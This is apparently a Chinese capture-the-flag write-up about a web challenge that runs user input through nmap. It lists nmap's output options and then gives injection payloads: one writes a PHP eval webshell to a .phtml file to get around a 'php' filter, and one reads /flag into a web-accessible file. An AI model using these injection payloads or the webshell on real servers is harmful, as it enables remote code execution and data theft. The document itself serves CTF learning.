站老是崩,有点难受。
过程
1.题目非常熟悉,以前在buu写过。主要考察nmap的一些用法。
2.
选项 解释
-oN 标准保存
-oX XML保存
-oG Grep保存
-oA 保存到所有格式
-append-output 补充保存文件
选项-oG
将结果Grep保存。
nmap -F -oG test.txt 192.168.23.1
选项-oA
该选项可将扫描结果以标准格式、XML格式和Grep格式一次性保存,分别放在.nmap,.xml和.gnmap文件中。
3.尝试对扫描结果进行指定文件保存,
输入-oN aa.txt,然后访问/aa.txt
出现:# Nmap 6.47 scan initiated Mon May 18 15:58:14 2020 as: nmap -Pn -T4 -F --host-timeout 1000ms -oX xml/05cc1 -oN aa.txt \
4.于是猜测是否可以写一个木马文件上去,测试发现过滤了php字符串
可以上传<?=eval(\$_POST[a]);?> 文件名为phtml
payload:' -oN b.phtml <?=eval(\$_POST[a]);?>'
访问b.phtml
5.当然还有更简单的写法。127.0.0.1' -iL /flag -oN vege.txt '
然后直接访问即可。